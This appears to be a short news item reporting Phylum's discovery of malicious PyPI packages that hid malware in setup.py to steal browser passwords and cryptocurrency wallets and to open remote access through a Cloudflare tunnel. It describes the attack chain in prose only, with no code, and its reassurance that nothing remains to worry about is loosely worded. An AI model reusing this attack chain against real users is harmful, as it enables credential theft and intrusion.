These packages were discovered by Phylum between December 22 and December 31, 2022, including pyrologin, easytimestamp, discorder, discord-dev, style.py, and pythonstyles. These packages are now removed so there is nothing to worry about.
Beware of Malicious PyPI Packages
While those thinking how this malware deployment process takes place, the malicious code is concealed in setup script (setup.py) of these libraries, meaning running a “pip install” command. THe malware is designed in such a way to launch a powerShell script that can retrieve ZIP archive file, install invasive dependencies such as pynput, pydirectinput, and pyscreenshot. While telling about the libraries that are created through this malware, Phylum said: “These libraries allow one to control and monitor mouse and keyboard input and capture screen contents, saved passwords, and cryptocurrency wallet data from Google Chrome, Mozilla Firefox, Microsoft Edge, Brave, Opera, Opera GX, and Vivaldi browsers. The person behind it has adopted a technique to download and install clourflared, a command-line tool for Cloudflare Tunnel. The main idea behind it is to remotely access the compromised machine via a Flask-based app. The hacker can run shell commands, download remote files and execute them on the host, exfiltrate files and entire directories, and even run arbitrary python code. Also Read: These 4 Android Apps Redirect Users To Malicious Sites